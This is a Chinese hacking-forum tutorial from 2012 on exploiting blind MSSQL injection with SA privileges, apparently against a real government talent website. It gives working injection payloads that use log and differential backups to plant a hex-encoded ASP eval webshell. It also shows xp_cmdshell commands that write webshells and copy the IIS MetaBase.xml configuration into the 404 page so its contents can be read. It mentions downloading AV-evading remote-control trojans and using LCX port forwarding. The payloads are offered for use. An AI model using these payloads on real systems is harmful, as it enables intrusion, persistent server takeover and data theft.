找回密码
 立即注册
查看: 2864|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
1 C* S" [( i$ x* B$ ~& ^* {; b* `! T9 C8 _% x- j' k. b

' }' }9 Y5 z1 W' s. k4 b                                                             欢迎高手访问指导,欢迎新手朋友交流学习。0 b4 U3 o$ n$ {6 E* X
  \1 D7 Y0 G: m2 q) o' `
                                                                 
/ ~/ u# V- ?3 _8 @                                                                 
4 `1 U+ J/ O9 x( o$ J+ Z2 @$ K                                                                  论坛: http://www.90team.net/8 V* C' J# f5 _1 V% ]6 ]
2 I; q' M: f8 k

' c# m% c% t+ W- Z" o
# o% H" B& g9 M7 U; {友情检测国家人才网4 A- w% h6 p+ y: o+ R$ X3 B* O

, W. H0 C2 b* q2 _( \) H* [1 n7 \  U2 C; d+ j) U
内容:MSSQL注入SA权限不显错模式下的入侵% e# C  p, d, v+ Q9 C/ e

% \/ V* h! M) g5 ]0 D* g5 K% d8 s& k! V* r& f# M, |
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。/ q$ r9 Q2 u# O, T

) Q' \* {5 }3 P0 E. J+ A* [我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
( y- H, P$ Y9 @6 G  }, r
) s( r5 N8 f: {9 g* s% m
  e# J; d1 Q+ r, n这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。2 q# n7 d7 F$ w+ Y7 l( v
- @0 Z+ Q3 `/ b0 P: o! j) n
思路:. e  n6 Q3 q( w$ n4 q% H
8 G8 t- i+ p1 Q. p
首先:
- W* Z; X3 t1 _2 G4 m4 @0 @7 ]$ c8 `/ ?' Z6 G& o' M
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。1 q: n+ A4 R' j8 {+ V' L

) B3 u/ H' ~9 T3 R9 D' E& h' ~% V1.日志备份获得Webshell4 B% Z, R. e) f
, @+ T* y* P/ C% a9 W
2.数据库差异备份获得Webshell
& j. _" j( c8 S0 j6 @- L6 K$ b& |" l; v
4.直接下载免杀远控木马。3 W- A2 v# Z. w- v) F

5 D# y+ F$ o  h5.直接下载LCX将服务器端口转发出来
6 S3 u- X" c9 {! C
5 g/ C# Y8 m6 n1 }) y9 w! B- S6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
( u$ v# |# {8 P+ V
$ a1 T  o( D3 `' @1 k4 J2 K9 g9 r7 S1 \1 f' r
8 j: }5 b( }2 X
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, ! q1 t$ F  e% V5 K
- ?: G# E8 ~: r7 h& [- _6 Y* o
我直接演示后面一个方法
5 b: m' l* T, t, o( C: Y" w9 E) N9 f- k3 T

( `; L( O( |6 F6 O6 c; C分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL * c2 Z7 M& }* p( B! b/ S

# T* @* ?, S- b5 W
' h5 b. y* J0 k9 O; w) R3 T' w& _3 o8 o) J7 t' z
1 n# U3 e4 a. V, H1 o: n) b
◆日志备份:) G; c# ^. z0 k# g  g

5 x% N, r5 q. K& c
1 }, b0 C4 |0 Q! J, ]- ?1. 进行初始备份! g4 L3 C0 J# u
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--# ~* k  Q% P! S3 f* m

5 I- n1 r1 \/ T7 L; p0 C. S* w2. 插入数据, m" |9 U- A* @/ U3 K" W
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--! C% A0 p: B5 I2 j6 g1 n" u

8 B8 t7 z8 c: l& S0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>1 n% `* }# f7 U; }7 [9 H5 V# ?
  
( i$ ?6 f( B( g" I" B+ Z" c6 S5 I3. 备份并获得文件,删除临时表
; u5 ?# O$ i: c3 n;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--3 @9 ~6 f7 D# Q) m; E; C
7 O6 w$ F+ S2 `. D- J

1 B" Y9 s& z/ z
7 v, O# ?& Q9 X  q9 q$ |◆数据库差异备份1 ], J" C& T- L
* k3 A2 k2 X7 |4 N* }: J
(1. 进行差异备份准备工作- t% k% Z' Z) z5 P( T  q! B; y
8 r5 A) ^8 I; ]( p* _# C: B) C
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--8 _# {1 m6 U" f' V0 w/ O
  r( z( G, _2 n) ^
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码1 p; T6 f+ {  R6 v% O

; x- z* i  S  K, ~, p/ _4 _" z% O
1 n; T7 A# m! M: ]/ Y( c(2. 将数据写入到数据库
" v, A* n7 C* a5 P$ w$ n& A/ G;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- ! |  ~% z$ E5 k  z; d, H$ @5 H8 F5 m! ]1 o

+ {( @9 J# x' W+ E7 V0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>4 u) c2 f6 {: V3 m& s" c) J

0 Q! `$ `# D, m/ c* x  G3. 备份数据库并清理临时文件& ?& Q3 n% L  H6 M. c( v* Z

$ R7 @- L' o6 b& R! u;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
4 |6 e* V/ w+ R( `
8 ~, F0 u8 |& F0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
7 ~- u9 z  R, b2 s- |5 x9 H0 p- Z3 ^0 s1 o

' d& E2 \, O; C. O% ]$ u6 }* k3 Q8 \1 ?. v
用^转义字符来写ASP(一句话木马)文件的方法:   . ?8 ~4 L7 z9 }  j) y/ L; {
: g* L; a8 M4 e
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--3 \4 Y& O; ^$ ?+ B; ?

! H: w; G" I( `7 t2 w# M  r: U2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 0 P5 k, K$ g7 ]
! }) e5 Z' ~& m% N- m
读取IIS配置信息获取web路径2 q7 d8 l: S* }* G, c
# f2 _3 T% }/ D8 D' x9 {! x
     
$ O7 ?8 b' d" L     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
! e; }/ o( D3 y' m, X( l6 X9 r
- a9 ^- a3 H/ I: j/ V执行命令+ t$ X& d3 T1 n4 }' n
     
5 b" s2 \  Q0 j" y. t     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--& F2 o# H- j8 ~4 y
: x: q: I1 \9 S! d' R4 q

+ [" y, @5 r3 S/ `8 d" K( Y$ c( h( X& M! B& Z8 b; c6 E
( p( @$ i. _' y. s: Z5 z
; ^0 R: A/ T+ |: M# }

2 a9 R) ?* B1 u: W- O, j8 y% D" B* S, X* j- N' k" _

# c, V4 V2 d- C  _) W. S) d6 k3 K3 Y
1 t" P% d% q# J# B1 w* n% _: h+ X; Q+ t5 N; N
6 r2 |" t8 f$ G9 @2 Z8 U

7 a7 I" z8 i! E% N0 W; n. C7 A9 Y: P5 p, |

/ L9 l, m9 L4 J+ ]# u; _) l, _3 b1 z$ z* u
- F) a! {+ L0 q4 R* u' U  @. u# s; \
# t5 P' W. G4 }, B
* u) ~4 B$ W$ y1 q- f  }

1 J8 w7 b  }1 d8 ?0 N! s4 K
, e1 {& Q, G# J1 ^( W) F7 g1 ~  Q% Z: a4 \

+ w( q1 P3 }; |( O# ?6 r$ h; R# K) U/ n) R& ^: Q) Z1 L
. z1 n6 d7 S8 B9 @
. F: P) Q6 m' r. n/ b
: d5 s0 R# W1 s1 a
3 ~0 h- \5 @5 Z4 L+ C; d. F2 P+ \

9 }$ q$ x/ v* l( b5 g  V0 @  J. t& ~' ^  D6 h
& j1 x6 q: h& n6 Z+ W. q9 Q+ w

5 m2 b: c2 B6 @$ ]# j% Y0 _4 P/ c5 R, z( j" j

$ q/ ?: {: {1 `
+ ~6 m; u- J  ^7 Y1 V, y# M' `
! L3 v/ x$ P" g) k8 j9 M+ P0 f/ `% f) d8 {
$ _% t2 a$ y# [- d. M& H2 |
' C+ `; d3 f3 O7 a
1 R% Q8 u6 Y0 Q+ ^) T9 T  J

/ y# L3 K7 C( }! c1 I0 J& p
. F5 ~  [, u; U- [, K& F0 [* b* P% b* c. P. U- p: p6 T

3 E% C9 t  @  a. ]. w9 z$ a0 z# u8 i7 g: a* G( ~8 D. |. A

8 b; b0 ^$ k# R2 K1 P7 \* P3 p7 w$ u1 n( H# V
$ @' m$ u# A( P3 p7 l% ~9 X

' e% Q* ~2 f6 k# i9 H1 x- ?, ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表